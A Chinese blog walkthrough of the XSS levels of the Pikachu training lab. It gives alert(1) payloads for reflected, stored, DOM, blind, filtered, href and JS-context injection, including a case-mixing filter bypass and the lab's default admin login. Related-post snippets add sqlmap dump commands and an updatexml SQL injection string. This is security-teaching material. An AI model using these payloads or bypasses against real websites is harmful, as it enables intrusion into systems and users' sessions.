pikachu靶场通关-Cross-Site Scripting(XSS)

最新推荐文章于 2024-06-25 07:00:00 发布
最新推荐文章于 2024-06-25 07:00:00 发布
阅读量258 收藏
点赞数 1
分类专栏: pikachu靶场通关 文章标签: xss web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/128895132
版权

Cross-Site Scripting

反射型xss(get)

  • 输出点

    image-20230205230808928

  • 构造payload

    发现输入框限制了长度,通过F12修改maxlength属性

    <script>alert(1)</script>

    image-20230205231024933

反射性xss(post)

  • 输出点

    这里需要先登录,我也是看了半天才看见提示的 admin 123456

    image-20230205231449387

  • 构造payload

    <script>alert(1)</script>

    image-20230205231641240

存储型xss

  • 输出点

    image-20230205231628472

  • 构造payload

    <script>alert(1)</script>

    image-20230205231646461

DOM型xss

  • 输出点

    image-20230205231752087

  • 构造payload

    #' οnclick='alert(1)

    image-20230205231934377

DOM型xss-x

  • 输出点

    这里输入后要先点击一下”有些费尽心机想要忘记的事情,后来真的就忘掉了”这句话

    image-20230205232227798

  • 构造payload

    a' οnclick='alert(1)

    image-20230205232341603

xss盲打

  • 输出点

    根据提示来到/xssblind/admin_login.php目录下 使用前面关卡的账户密码登录 admin 123456

    登录后发现我们刚才写的留言和内容会显示在页面上

    image-20230205232758704

    image-20230205232835459

  • 构造payload

    输入payload后刷新/xssblind/admin_login.php页面会发现注入成功

    <script>alert(1)</script>

    image-20230205232954915

xss之过滤

  • 输出点

    image-20230205233041304

  • 构造payload

    会发现有很多标签都被过滤,使用大小写绕过

    <sCript>alert(1)</scrIpt>

    image-20230205233254578

xss之htmlspecialchars

  • 输出点

    htmlspecialchars()是把预定义的字符转换为 HTML 实体。

    image-20230205233437754

  • 构造payload

    1' onclick='alert(1)

    image-20230205233519928

xss之href输出

  • 输出点

    image-20230205233550665

  • 构造payload

    javascript:alert(1)

    image-20230205233858223

xss之js输出

  • 输出点

    查看页面源代码,可以发现我们输入的值被放在了<script>标签中,可以对此进行利用

    image-20230205234601748

  • 构造payload

    1';alert(1);'

    image-20230205234717469

贫僧法号云空丶
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
皮卡丘xss之盲打、xss之过滤
Fly_Mojito的博客
05-30 941
皮卡丘xss之盲打、xss之过滤
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 3889
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
pikachu靶场xss通关教程)
记录学习
05-11 1477
pikachu靶场通关xss
初次使用Pikachu漏洞平台进行测试实验
poptar的博客
05-18 3963
初次使用Pikachu漏洞平台进行测试实验 第一次攻击实验具体操作 首先来看一下pikachu平台上的反射XSS漏洞. 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公
pikachu靶场 xss漏洞
winofkill的博客
12-18 529
pikachu靶场xss漏洞
pikachu靶场之Cross-Site ScriptingXSS
Christma1s的博客
03-06 527
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类: 1.反射XSS; 2.存储XSS; 3.DOMXSS; ...
pikachu-XSS(跨站脚本攻击)
a1245678899的博客
11-09 1125
XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容 被当成正常的HTML来执行(类似于SQL注入),从而产生危害。造成DOMXSS的原因是前端的输入被DOM给获取到了,通过DOM又在前端输出,跟反射和存储比起来,它是不经过后台交互的。存储XSS反射XSS形成的原因是一样的,不同的是存储XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害。编码,后台过滤了特殊字符,比如标签,但该标签可以被各种编码,后台不一定过。
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场通关
11-19
pikachu靶场通关
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
pikachu-xss.txt
06-10
pikachu-xss
pikachu平台之xss漏洞
qq_42728977的博客
12-16 3039
反射xss(get) 原理 传递的参数直接存在页面代码,而且没有过滤 流程 打开页面 发现有长度限制,F12进行修改 。 输入特殊字符,检查是否有过滤 发现并没有过滤,而且直接在页面代码了 存在xss漏洞,尝试输入<script>alert(xss)</script>,发现有长度限制,用F12修改后。 反射xss(post) ...
Cross-Site Scripting-跨站脚本攻击
田田云逸的博客
04-28 526
#' onclick=alert('jwt') '</a>闭合后:<a href="#" onclick="alert(1399)">#' onclick='alert(1399)
xss 输出进行html编码,PikachuXSS-盲打、过滤、htmlspecialchars、href与js输出
weixin_31530761的博客
06-28 586
XSS盲打:前端数据交互的地方,输入信息,输入后的结果不在前端显示,也就是只有后台能看到输入的内容,从前端无法判断是否存在XSS,这种情况下,我们直接往里面插入XSS代码,然后等待。我们先进入盲打的页面:然后在上面的文本框植入script标签,你的大名的地方随便写就可以:alert('xss') / 123然后发现并没有弹窗,没有特别的事情发生:打开右上角的“点一下提示”,里面的内容提...
渗透测试-xss钓鱼测试和xss盲打
lza20001103的博客
04-24 2345
渗透测试-xss钓鱼测试和xss盲打
[PiKaChu靶场通关]Cross-Site Scripting XSS漏洞
网络安全知识分享
09-28 8045
PiKaChu通关 XSS漏洞一、反射(get)二、反射(post)搭建环境三、存储xss漏洞利用1、注入跳转网页2、网站钓鱼3、获取键盘记录四、DOMXSS二级目录二级目录二级目录二级目录二级目录 一、反射(get) 如下图,我们输入了20个1,发现不能再输入了,我们猜测是有字数限制: F12找到输入框,发现我们输入的上限只有20个字符,删除或修改为100即可: payload: <script>alert('拈花倾城')</script> 弹窗如下图: 二、
8.XSS盲打
最新发布
愿听风成曲
06-25 222
首先在xss盲打界面输入攻击代码和随意的大名提交即可。管理员界面直接会弹出xss界面。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu --tables。 2. 然后,您可以使用以下命令来查询指定表名(例如users)的字段(例如username和password)并导出结果:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu -T users -C username,password --dump。 3. 如果您需要爆出数据库名为pikachu,您可以使用以下命令:a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值